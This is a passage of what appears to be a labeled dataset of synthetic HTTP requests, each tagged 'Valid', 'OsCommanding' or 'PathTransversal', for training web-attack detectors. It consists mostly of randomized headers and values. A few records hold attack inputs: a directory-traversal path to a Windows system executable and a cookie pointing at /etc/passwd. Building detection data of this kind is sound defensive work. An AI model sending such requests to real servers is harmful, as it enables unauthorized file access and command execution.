Host: www.r5tOa1.biz
Connection: othfhlet
Accept: application/*, application/*;q=0.6, image/png
Accept-Charset: x-mac-greek;q=0.8, iso-2022-jp;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 112.202.157.195
Cookie: hH6lcxiundscewe=50;andservicesnullY=rGf2x;eiw7annzatshfna=mttaone ;eoxs=MCegio
Cookie2: $Version="50"
Date: Tue, 13 Apr 04 23:13:06 CET
ETag: W/"iGg4GyFoonVM8sn"
Expect: 100-continue
From: ske7oetj@eo7inee.cz
If-Modified-Since: Thu, 06 Apr 06 17:32:48 CET
If-Unmodified-Since: Mon, 02 Mar 09 03:19:29 UTC
If-Match: *
If-None-Match: *
If-Range: "6cmzok9EcMllWfHOmOkb"
Max-Forwards: 5461
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM c29ib2V0ZXB6dGpzc2k2bm1vcnJoYWV0SXQwZ3RvczZ0bg==
Authorization: Oueba TSkes=e8Hse
Range: 127-
Referer: http://www.a6seqssi.cz/enfodto.wav
TE: trailers
Trailer: Proxy-Authorization
User-Agent: oemii4/5.0.1.6
UA-CPU: MIPS
UA-Disp: 801,8735,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 352x5203
Via: HTTP/8.1 209.151.137.182, FTP/6.4 74.68.128.75, HTTP/2.4 www.nnts5.jpeg
Transfer-Encoding: identity
Upgrade: dl2nol/1.8, hopeH/5.6, tvmd/4.2
Warning: 317 www.kcoono.tiff "csd2erdpoarTetors" 
X-Forwarded-For: 73.2.112.190
X-Serial-Number: 6737813475044771
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 24367
Start - Id: 12349
class: Valid
GET /tZC/kstziu1ldme/connectsP-H-18dNJvbscriptFAcmd/ret/niyrra3EnnaIRe/lyBEuaV2hKzN/uUTOk68m4kmrIH/hoyept9/betweenMcspWEeSTnullp/plfrw7mhe.php3?cat_FVjSZu=+%40o&Hp=s0aPABx&ifsUE8R4=089522&86yc-iG=212844&a6ecct=52&LecChBrgcts=%28phtmpns++&1ysnPntiloL=6&arla98ae=%5Bos%3C3wsoallnn&l1=swtmN2wget%3Dhplaawp-be HTTP/1.0
Host: 197.144.71.218:4
Connection: eH9OtttA
Accept: application/zip
Accept-Charset: hz-gb-2312, utf-7;q=0.9, windows-1250;q=0.2
Accept-Encoding: 
Accept-Language: lu0hp-reeNemn, hssoAc4-n, nh6-l4a8t, mc-ctzthtna, smoSt-l;q=0.1
Cache-Control: no-cache
Client-ip: 223.191.96.191
Cookie: k018hrpd=rqoe4oelg ewindow.openhc rt~Ns
Cookie2: $Version="47"
Date: Tue, 15 May 07 13:15:46 CET
ETag: W/"cS2adMT5Ba5.Q7mw3zOF"
Expect: e7evcu
From: huuAfxy@eyooxthv.fr
If-Modified-Since: Sun, 20 Apr 08 20:20:35 UTC
If-Unmodified-Since: Tue, 09 Aug 05 21:06:03 CET
If-Match: *
If-None-Match: "C7oTvwKDuvP0ik_"
If-Range: "NchvYWFn5Mi0ntJ0k"
Max-Forwards: 88
MIME-Version: 0.6
Pragma: shniw=xAftct
Proxy-Authorization: Basic aW5uZWtjaTpibnN0dTU=
Authorization: Basic Z3Q3bmltZHk6aWVuZ2lj
Range: 662-4,8147-,483669-546
Referer: /uegWh/0rmiu/i8u3pna/tAd7n.html
TE: trailers
Trailer: Trailer
User-Agent: tbeemeruab/4.0.5.4
UA-CPU: Sparc
UA-Disp: 3711,172,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 8258x863
Via: 2.0 93.37.228.125, HTTP/8.5 www.w9yt6p.htm
Transfer-Encoding: gzip
Upgrade: oE2te/7.8, Hstma/8.3, oi5ia/6.9, iXetpi/8.4
Warning: 258 141.130.237.37 "ioreaseroE" "Tue, 27 Sep 05 18:21:28 UTC"
X-Forwarded-For: 202.158.102.83
X-Serial-Number: 250138591797251529
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12349
Start - Id: 31759
class: Valid
GET /euefavbdAehwtxlcdI/linkGEvaccepttm@2-8/tUJrqNnbd/tK1Boc5accept9n6Lql/mz0bmUZ7KDh/lt7I4tNV/aSJOzcn9yjXJR./_HH@ICnVEmOiZ3.htm?gsnnmtuT1we=nph-+o&hU8f=oyxo5iefh6s9sensn3&tqsx=57&ehr4h=48877979 HTTP/1.0
Host: 183.218.108.207
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: nHZepn=lRtneeie
Client-ip: 212.62.42.83
Cookie: HOSh0FDglibD=95
Cookie2: $Version="2"
Date: Mon, 29 Mar 04 05:39:39 GMT
ETag: W/"vlh10JSotRr11jEt"
Expect: 100-continue
From: o58tOaQr@asxayh.com
If-Modified-Since: Thu, 17 Jun 04 21:27:07 UTC
If-Unmodified-Since: Mon, 28 Jun 04 10:29:30 GMT
If-Match: "PkfxCrHMTNoNQy59KB"
If-None-Match: *
If-Range: "zVkhY123ECjk1nLn2QK"
Max-Forwards: 7
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM M2VzNm9jYm4yc3N0NmZYMW91bFNkRWhybHNyZkZzZW5sYWVsSHFhcnNsY3c=
Authorization: Basic bTJPWDpyb2hhZWQ=
Range: 707434-,-591
Referer: /auhd.css
TE: trailers
Trailer: If-Match
User-Agent: 4tniNne/4.2.5.6
UA-CPU: Sparc
UA-Disp: 794,2521,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0437x4847
Via: HTTP/4.4 140.27.128.206:28, HTTP/4.7 226.246.122.170:4, pzrpsn/1.7 213.249.152.155
Transfer-Encoding: identity
Upgrade: Nesagu/1.4
Warning: 198 227.83.143.66 "ntior4dtoetty" "Sun, 24 Sep 06 10:26:52 UTC"
X-Forwarded-For: 78.110.85.184
X-Serial-Number: 48619214669
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31759
Start - Id: 13757
class: Valid
GET /dSgK97/Rioeredsi98sa/ssNDyUBw/rfhaqda0An0e3etu/arkpVqG/tIxuj/ueAernase9ds3tesj/0w-GXindk/sG@6185D/eVWW.aspx?rcPYCTtmpK=w2N3W0Ttk7U&ceAForRIn2sre=%25u%5ChCm0e%28haccess_logrtA&faehmsr=sos%7Cdo+&fttihsIeE=100674 HTTP/1.1
Host: www.h3n6gelas.uk:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: utf-8;q=0.7, cp-950;q=0.9, cp-932, x-mac-ce
Accept-Encoding: *
Accept-Language: 8vaThaT-8, itnyioa-opozetsi;q=0.8, 7eeenii2-liln
Cache-Control: max-age=2
Client-ip: 58.102.229.56
Cookie: dijeljy=@l1;7e8nar=stryTgw;estto=N)r;i46wseagS7sei=tSut
Cookie2: $Version="9"
Date: Wed, 01 Sep 04 01:32:52 CET
ETag: "vDGVu79jEDu_3Ih"
Expect: zrev
From: gnhB9o@rfci.com
If-Modified-Since: Sat, 10 Mar 07 20:32:06 UTC
If-Unmodified-Since: Sat, 26 Mar 05 11:27:07 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 22 Jul 05 03:57:46 GMT
Max-Forwards: 31
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic ZWk2NWE0YTpzdG9tZTJodA==
Authorization: Digest algorithm=ac7siaiC
Range: 11-,904144-8
Referer: /cs5lze1.php
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: ylutf7ba (sdyI0f493; gcGYTNVB-G; sfVevz)
UA-CPU: PowerPC
UA-Disp: 173,9492,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 006x597
Via: esrho/2.8 107.196.37.132:0
Transfer-Encoding: deflate
Upgrade: 4tkn/9.7, fa3eis/5.5
Warning: 820 www.uproeo.htm "Ianeee" 
X-Forwarded-For: 52.127.152.38
X-Serial-Number: 26172268
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 13757
Start - Id: 1235
class: Valid
GET /4passwdLYlqQ3z-/ezGhfHiP@l/oisiusstlutcei/ixjefiAe9tbrcuretm9/e5LEh1g_O7/P.cm/encodde/lsHozDMro-tg1/tQ8D85EZiqOfCo/ae9f08hFjRHqjb/WkyRdfjSinsertzOC_t.bin?rbseloeDfze2Ti=a6glay%26&1http9pJB=jinatdslsplucMar&aopghsenceTunri=451&rctv=9uoOiiqa&jnedokd=rQ&KLmweO%uDkpe=v%7Crmf%7Eedneevw9&u5atiuag=4837&avshm=pqP%40nn3196&1dUaeeufitXs=iPxmlig%3Eg&xenEaOt=48832&cA1theec9=iNt HTTP/1.0
Host: www.aleWdoseai.com
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: heaapteu-iactryo, iuespahb-dftAT
Cache-Control: no-cache
Client-ip: 43.91.142.232
Cookie: sq7eyH9=pfuyutst;fT=t mq
Cookie2: $Version="6"
Date: Sat, 29 Jul 06 20:05:35 UTC
ETag: "rMdLeei2EugdD8@C0K"
Expect: 100-continue
From: rrss18n@ElE01poue.cz
If-Modified-Since: Mon, 04 May 09 01:31:15 UTC
If-Unmodified-Since: Tue, 22 Feb 05 13:46:31 CET
If-Match: "edr1tf2TvoVnYaHFq2"
If-None-Match: "k.4SbJ0f7iSkHRCtnd"
If-Range: Fri, 08 May 09 16:40:42 UTC
Max-Forwards: 079
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM N21ybW9TZ2Ezb2hsb2FPczV0Z2VuOHQybHJlaWdtbm8ybHM=
Authorization: lgitxu ezaue=wnxda9
Range: -709
Referer: http://fwnaoo.com/Ai7so/4tMee/hatsowfA/inne3y.nsf
TE: chunked;q=0.9,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.0 (X11; U; Open BSD i386 0.3; co-oo; rv:3.7.3) Gecko/68510535
UA-CPU: PowerPC
UA-Disp: 092,1496,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6040x9780
Via: 6.9 www.drer.tiff:58764, FTP/3.7 www.rhrstb.shtml, 1.1 95.105.254.37
Transfer-Encoding: deflate
Upgrade: coiqe/9.7, 2su/5.0, e5rlaa/0.2
Warning: 355 www.oitdunti.shtml "nysuba" 
X-Forwarded-For: 84.26.195.189
X-Serial-Number: 326327
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1235
Start - Id: 43748
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.0
Host: www.opqco1r0ao.st:80
Connection: keep-alive
Accept: text/*;q=0.8, text/*;q=0.1, image/png
Accept-Charset: windows-1251, iso-8859-2, windows-1255, cp-936;q=0.5, cp-936
Accept-Encoding: *;q=0.2
Accept-Language: PSs-etere, tc-utE;q=0.6
Cache-Control: no-cache
Client-ip: 251.209.185.79
Cookie: Ae=41534;tite=qffd se6;ebhumr=t;1eo=elIetDwehmU;Ed5ukr=oaeform
Cookie2: $Version="26"
Date: Mon, 22 Oct 07 10:18:48 CET
ETag: W/"S2kqKS2NgMYdq_Ze"
Expect: fe8gaSr=na4I2h
From: Reoco@amlrswscus.de
If-Modified-Since: Wed, 29 Jul 09 03:01:36 GMT
If-Unmodified-Since: Sat, 14 Mar 09 15:03:08 GMT
If-Match: "Og8_QFTcIUnGtXIWg"
If-None-Match: *
If-Range: Tue, 19 Oct 04 05:08:13 GMT
Max-Forwards: 45
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: naeven zndoO=eonsiuNe
Authorization: NTLM ZTRubDJ0c3NQOW9BVTNzc2llc2VpdGR1SnRyZXB1dHdt
Range: 2335-
Referer: /ee2f/7Wi6ee/pt0od3Z.html
TE: trailers
Trailer: Accept-Language
User-Agent: e1sothi1dnunOls
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7271x959
Via: FTP/9.0 241.198.167.113, naqf/9.5 www.etcod.js
Transfer-Encoding: identity
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 960 13.127.188.120 "eVdond" 
X-Forwarded-For: 181.45.24.67
X-Serial-Number: 36260359600073
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43748
Start - Id: 46453
class: PathTransversal
PUT /e7rKKq9_x/eHm0@PyrZ8jK/cYx6NrE@4yodg_B/ccgK7KowUKj6/hnehwgecpTes/6vjinf8LBc9bcopya/aS8qoc/tsixk1XaQcKy.cfm? HTTP/1.0
Content-Length: 46
Content-Language: e,tsidbdi
Content-Encoding: identity
Content-Location: http://4oveew.de/srnwe/atbe.pl
Content-MD5: dHNzZXRyTnJwaHRkZW5jaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 07 Feb 06 10:20:35 UTC
Last-Modified: Tue, 10 May 05 17:07:42 UTC
Host: 124.209.202.148
Connection: close
Accept: application/*, audio/x-wav
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: n-1, l-xnltonm
Cache-Control: 6=raj6
Client-ip: 25.53.81.232
Cookie: zshji8eYazp=j9r3danns5iewredg;N4d.uWmailGuR_=9595;img.QvO-=/etc/passwd;2tsS= uea
Cookie2: $Version="192"
Date: Fri, 20 Nov 09 04:31:03 GMT
ETag: W/"fZjz@U791LTHRkqn"
From: ahepi@csnwoote5h.cz
If-Modified-Since: Thu, 27 Dec 07 18:10:17 UTC
If-Unmodified-Since: Mon, 19 Apr 04 22:09:52 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1952
MIME-Version: 2.2
Pragma: enrO='aeeweOH'
Proxy-Authorization: Digest algorithm=MD5
Authorization: ahCads 2jidj=emtib
Range: 8-887,-127751
Referer: /yfkEf/tsntu/yajt0/pisur.png
TE: chunked;q=0.8
Trailer: If-Match
User-Agent: e195MS4e http://www.eadr.gov
UA-CPU: MIPS
UA-Disp: 5969,209,16
UA-OS: Windows NT
UA-Color: color16
Via: 4.6 www.i5twlv.jpg, 4.1 198.174.77.72, 5.0 116.15.245.17
Transfer-Encoding: identity
Upgrade: nIj/5.3, nefeg/1.1, 7worrm/1.2, HIs/4.4, bl4/5.6
Warning: 806 www.otg3mlp.shtml "nhahtbt" "Wed, 05 May 10 01:40:34 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

frlh=tCjXLR&lnu=e8tts&4tamo=eaiya;d6&sfKe=53

End - Id: 46453
Start - Id: 5983
class: Valid
PUT /oWy@/tyz/sEkGgDxWZK/eea08i.html? HTTP/1.1
Content-Length: 133
Content-Language: tslan
Content-Encoding: identity
Content-Location: http://teiiaogr.it/ntsxacIe/zk8xie/a6Ga/nherft.cgi
Content-MD5: aXo0bGFNZDR0RGZlWHhuVA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Jun 04 05:15:49 UTC
Last-Modified: Tue, 29 Jun 04 07:53:50 CET
Host: www.nheidccao.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: uslfee-g;q=0.8
Cache-Control: only-if-cached
Client-ip: 157.18.89.84
Cookie: selegOtunf=P@A6include;nLTallTCKhttpswp-Ht=tYxep3@Ry;iv0tboNerplEn0=itRt;iduneoi0=nKmw_cuEN;tetuhrhoS=514986130
Cookie2: $Version="00"
Date: Sun, 07 Mar 10 21:21:43 GMT
ETag: W/"@2rwa41.yZ6O3.dQA"
Expect: rr6iNl
From: aH2oeaxm@3EiRSay.org
If-Modified-Since: Sun, 22 Jul 07 22:59:41 CET
If-Unmodified-Since: Tue, 29 May 07 20:47:36 UTC
If-Match: "SdMgTHDdD6waJWCZb"
If-None-Match: "H6KH-4jOw4CnNJ7yu"
If-Range: Wed, 25 Jul 07 18:01:21 GMT
Max-Forwards: 09
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest nc=691127d9
Authorization: orco nenIeucx=shart0ia
Range: 7772-71595
Referer: /onee/miIs/eaqt/ldAel.bin
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/3.4 (Windows; U; Win 9x 9.9; ba-i8; rv:9.2.4) Gecko/07589543
UA-CPU: PowerPC
UA-Disp: 879,569,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3062x279
Via: 3.0 6.203.184.21
Transfer-Encoding: identity
Upgrade: treana/1.3, oher5/3.1
Warning: 803 226.93.188.78:98 "lhtttca3" 
X-Forwarded-For: 232.218.22.35
X-Serial-Number: 913619752558918
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aef=abdaher6harniDa&TmncKeoevOBp=lErscriptscriptcp&luE7t=y)l|oo@isere&arz=2tyime8hrCwhoiurh&cTCSu5BNFcT=Trun3Ji&nohtIerteo3i=98

End - Id: 5983
Start - Id: 2384
class: Valid
GET /rv6kfSf/atep6oismcur/yqTwljKxml06/irsnI4h8abteflarxw/boImVoinUB6DR/fsix1b-5rQeUmILDM3iA/7R1execO/oSrHozJ17d@vI76./cskmoic.jpeg?amioniqez=2&QvIE5i=340618481&iobla76utsYeee=8945&y3iagnetnaor=lsho%3Eeson5pHr&AlahthE=nNa%2Fv HTTP/1.1
Host: 247.214.181.233:80
Connection: turrr
Accept: audio/*;q=0.6, image/*
Accept-Charset: iso-2022-jp, big5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 5.42.119.100
Cookie: hiaucbn8=pnCujhsnn4lnnl
Cookie2: $Version="665"
Date: Tue, 23 Oct 07 23:52:21 UTC
ETag: W/"HfLLigl2V_jPpDU0j"
Expect: 100-continue
From: sd6cae@hblxe7.st
If-Modified-Since: Sun, 06 Nov 05 21:56:59 CET
If-Unmodified-Since: Mon, 16 Feb 09 13:23:50 CET
If-Match: *
If-None-Match: "6M.YAFjsjx8cWDW"
If-Range: Sun, 04 Apr 04 21:12:30 CET
Max-Forwards: 69
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest response="32CC03ccCD2C4F02bb800C8DE1CCEbDB"
Authorization: Basic bnRzaTpTYXlh
Range: 7-40040,63-,119158-
Referer: /rt6egu1m.gif
TE: gzip
Trailer: Pragma
User-Agent: xlAgcEHdk8/9.6.8.6
UA-CPU: PowerPC
UA-Disp: 311,7575,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3780x3384
Via: 5.2 www.loee8tbo.css, 4.1 www.serntg.jpeg:37262, 1.6 www.beteoa.jpeg:3
Transfer-Encoding: identity
Upgrade: nEfN/0.4, eaOtr/7.9, earq/2.4, fjA/6.5, egcn/8.1
Warning: 080 59.32.22.40 "h9ro" "Sun, 12 Aug 07 22:20:17 GMT"
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 67775
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2384
Start - Id: 1407
class: Valid
GET /nnaq06y3dj6/gJ.5IOhaD3oQc9WuFCi/iIclLFyxmIY/-WP3rFzd/d4/tLVYK9.YCUxbAOC/oeted/cOQu2.tiff?tmp6KDJ=li2HdsjMrilNrel HTTP/1.1
Host: www.ea1ttdta6.st
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: u-estc0, er-sPj, fmreqf-ze;q=0.0, e-a;q=0.1, t-o
Cache-Control: no-store
Client-ip: 145.43.119.173
Cookie: n0o=952808954;sj=uLeqmD-ft-ub;5M09h-=1tr-ulN4ott;eonmaheutatdt=yyxbdbc4wx;ntkito=JptD;eRyifeoloeEeiai=thg
Cookie2: $Version="77"
Date: Thu, 25 Nov 04 24:12:42 CET
ETag: "3YvwRJfRSCNjWREyB9"
Expect: 100-continue
From: yftrn@tadt1hw.st
If-Modified-Since: Sun, 08 Nov 09 02:05:32 UTC
If-Unmodified-Since: Fri, 03 Feb 06 06:00:39 GMT
If-Match: "Wm7z9UcFF4Lxw3tnIwtG"
If-None-Match: *
If-Range: *
Max-Forwards: 19
MIME-Version: 7.3
Pragma: no=uaehc
Proxy-Authorization: s3a9ty dgws=1v3t
Authorization: etrs i6qeq=cksptoBr
Range: 6-15763,0058-47
Referer: /nnwninL.php
TE: chunked;q=0.8
Trailer: Proxy-Authorization
User-Agent: 6tio (eq4ypc3NQH; shOeVj9; n6F_Ug1; egDfVYD)
UA-CPU: x86
UA-Disp: 018,1433,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 238x900
Via: 3.3 www.nnhmCoEt.png, 3.1 202.242.249.213, HTTP/7.7 106.26.90.110
Transfer-Encoding: compress
Upgrade: etiga/2.7
Warning: 770 www.eTeDmS.jpeg:49 "e1Lit6sroulO1cet3" "Tue, 08 Sep 09 01:51:56 GMT"
X-Forwarded-For: 166.217.103.151
X-Serial-Number: 1347008
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1407
Start - Id: 25547
class: Valid
GET /eri.mspx?Sela5sNcqctoge=5ewRsecl1bgsoundpN%3Dca&aaisgdtrhkb=irdt&Telne=9&sebltewk=omaEOth&uwama4lefirclsr=tsgeg&Is=dmpoAncutmptvi&2rziay=r HTTP/1.0
Host: www.ellhoy3a.org
Connection: sraF
Accept: audio/basic, audio/x-wav;q=0.5, audio/*;q=0.7
Accept-Charset: x-mac-arabic;q=0.6, utf-8;q=0.7, utf-8;q=0.1, iso-8859-3;q=0.8, iso-2022-jp;q=0.3
Accept-Encoding: *
Accept-Language: chmdlnte-sptthxb;q=0.8
Cache-Control: min-fresh=3
Client-ip: 22.166.212.236
Cookie: x9Pigjrpasswddy= ~;imiotoTEiean=tvautd;R8eeKto=p idh;dnnez=adMQOWiaU6;lwnenaal4bR=ceteja0sa;dspSvej=5938607
Cookie2: $Version="1"
Date: Fri, 09 Sep 05 10:02:20 GMT
ETag: "VRBKKGL52QsAU@f"
Expect: iorogo
From: iisl@HkElln.cz
If-Modified-Since: Fri, 09 Jun 06 10:38:09 UTC
If-Unmodified-Since: Wed, 09 Aug 06 20:36:33 GMT
If-Match: "l6vkGMmxx3b4jBE"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 6.4
Pragma: feArs='aceoset'
Proxy-Authorization: ntlrt msoetln=heso
Authorization: she0tk Ctarti3o=uhrc
Range: 9-,-76849,526527-658
Referer: http://6hjl.biz/tsndaEa/jle9/erknngea.cfm
TE: gzip
Trailer: Trailer
User-Agent: ierNf/5.6.2
UA-CPU: MIPS
UA-Disp: 0510,736,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8556x2731
Via: FTP/4.5 162.253.74.197, 0.0 165.33.162.106
Transfer-Encoding: gzip
Upgrade: Nu1w/8.6, l3aK/7.7
Warning: 142 222.56.226.72 "tngnIadabbtID" 
X-Forwarded-For: 161.67.138.114
X-Serial-Number: 5960932931614
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25547
Start - Id: 25419
class: Valid
GET /ehatdh9rtasp6nnihezS/teeamrmy/tR.kOf64@7jRh/nBkvt/CbdropFz53U@.BwP76/A0x/eg/x7DyKmwgjE/iLbiL/d9CpNW.MjoQ/ipexkmenelvj.bin? HTTP/1.0
Host: www.reylt.net
Connection: close
Accept: audio/*;q=0.5
Accept-Charset: windows-1253;q=0.3, x-mac-roman, windows-1257, windows-1257;q=0.5, utf-7
Accept-Encoding: 
Accept-Language: yAazte-d
Cache-Control: no-store
Client-ip: 141.90.56.165
Cookie: 1ufe8shrz=lJYG1;irvrzsocts=8867;Ege=62
Cookie2: $Version="78"
Date: Tue, 09 Jun 09 07:37:44 GMT
ETag: W/"NuB1T865FwH.zLE"
Expect: leet1lr
From: ledpneia@lcpqUt.de
If-Modified-Since: Sat, 06 Jan 07 04:25:39 GMT
If-Unmodified-Since: Sat, 06 Aug 05 04:07:01 UTC
If-Match: "Ojk9XXY0LyjGE3oWO-kN"
If-None-Match: "7mEwrOqSFDKM7gY8CE4l"
If-Range: Mon, 27 Oct 08 07:48:32 GMT
Max-Forwards: 5343
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: hmMc hcaent=h2ppqntm
Authorization: NTLM ZW5tOXR1VGVzdGVjZWhuaHRvdmRsc3BleWNJYnpXZWxpZUF1bmFjcmVvZWU=
Range: 06-841799,-16,747140-
Referer: /ehlcet/egsy/dmrnxTHt.fgf
TE: trailers,deflate;q=0.9,trailers
Trailer: If-None-Match
User-Agent: eecpbrj8/3.4.2
UA-CPU: x86
UA-Disp: 4448,2047,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 407x092
Via: 6.9 201.130.218.214, chtc/0.5 www.aerutta.js, lrav/3.0 191.30.250.26
Transfer-Encoding: gzip
Upgrade: etmen/5.3
Warning: 257 2.176.158.197 "ifnht" 
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 588564161052
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25419
Start - Id: 2676
class: Valid
GET /wSozayoji/REXHEinputQCw6H/mhEiej48r/aMhNk/eeyceAh5etw7h/BR.swf? HTTP/1.1
Host: 15.219.18.177:3
Connection: iu20
Accept: text/xml, audio/*;q=0.4, application/*;q=0.8
Accept-Charset: shift_jis;q=0.8, hz-gb-2312, windows-1258;q=0.0, windows-1255, x-mac-japanese
Accept-Encoding: *
Accept-Language: iosseU-tdU;q=0.6, l8trhaEn-cutifs
Cache-Control: max-age=32
Client-ip: 97.1.7.203
Cookie: adropqF=aoaet
Cookie2: $Version="737"
Date: Mon, 14 Aug 06 16:02:48 GMT
ETag: W/"YgfCl574zFZDDyBiItIN"
Expect: 100-continue
From: ovamHuqy@MlywzI.fr
If-Modified-Since: Sat, 01 Nov 08 12:12:37 GMT
If-Unmodified-Since: Sat, 15 Jan 05 10:55:10 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 368
MIME-Version: 0.8
Pragma: gofLy='qi2eE6'
Proxy-Authorization: Basic MUVsdDoxb3NlY29mZQ==
Authorization: Digest cnonce="iwnae"
Range: -23,-6679
Referer: /l4nevol/njxq/ctoNh.nsf
TE: trailers,deflate
Trailer: Expect
User-Agent: phndXhHgLF http://www.ieezoFky.gov
UA-CPU: x86
UA-Disp: 6089,3163,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 486x934
Via: 1.8 www.aredte.htm, 1.6 www.2LdtrUEa.jpg, ttfk0Q/5.2 www.ahcHEs.jpeg
Transfer-Encoding: compress
Upgrade: azkuh/4.3, ztter/5.6, EyResi/1.5, vTvy/8.8
Warning: 749 www.okXda0.jpeg:63 "nQde" 
X-Forwarded-For: 94.59.133.217
X-Serial-Number: 8136074594585
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2676
Start - Id: 27559
class: Valid
GET /sakt1i8oiOba4/ehep8WijGB18/6SC2N4Vax7Mt@/aRttopde/accept1-ctphp-aboot.initt2HLs/xp_ARLclikex/Nows/sDzHZsLz68YfZ0uVMLd.dll?ganneoeeeta=2waooekxsalavnue&2rcpobjectBh=tVku&efycerrrodfdysT=tsir7M&son=%26&angolho=3485765&90d@VC@w=n7qye+ewa&yQopt7SPTAM9uu=e1qediecpjdiki HTTP/1.0
Host: 229.200.252.122
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251, x-mac-chinesesimp
Accept-Encoding: identity;q=0.2, identity;q=0.8, deflate, deflate
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 43.118.104.43
Cookie: nOfnrxatPs=i23a;eakw=adropdigloui6ryupdate;aoiVle=7888;wduvhjua2Et4zfr=servicesexec<ro;ettsemtThnhac6m=ieehmetal4;oe8sMo9=ewu
Cookie2: $Version="6"
Date: Sun, 15 Mar 09 11:04:42 GMT
ETag: "9ZCxqi6vbsm4MmPpj"
Expect: shete=A2xRIa9
From: rn1otcn@tde51wqd.st
If-Modified-Since: Mon, 04 Jul 05 07:08:11 CET
If-Unmodified-Since: Mon, 05 Nov 07 05:49:34 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 31 May 04 01:20:46 CET
Max-Forwards: 004
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic aWFvc2lmOmVlaGFzMw==
Authorization: Digest realm
Range: 0-33,159-222311,3856-
Referer: http://hehs4t.de/umEoeao/tnrh/sjarttds.mpg
TE: trailers,deflate,trailers
Trailer: Pragma
User-Agent: Mozilla/2.8 (Machintosh; U; PPC Mac OS X 7.1; sp-dc; rv:1.6.1) Gecko/56259875
UA-CPU: StrongARM
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 412x989
Via: HTTP/4.4 www.eonmr.tiff, 9.5 www.jeirh.tiff:0152
Transfer-Encoding: compress
Upgrade: tqtyi/0.3, 5aftHf/0.4, ifhtn/3.3, ntdsF/5.0
Warning: 199 www.retlii.gif "37stwavrtcE7t7wasn" "Sun, 24 Oct 04 10:49:59 UTC"
X-Forwarded-For: 49.154.202.141
X-Serial-Number: 76901665181608584434
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 27559
Start - Id: 32168
class: Valid
GET /y@wJb5B5y2X.js?8.iiyRgxtermmksp=30773&FG7nullMdWtbin=ist HTTP/1.1
Host: 58.189.186.9
Connection: keep-alive
Accept: */*
Accept-Charset: *
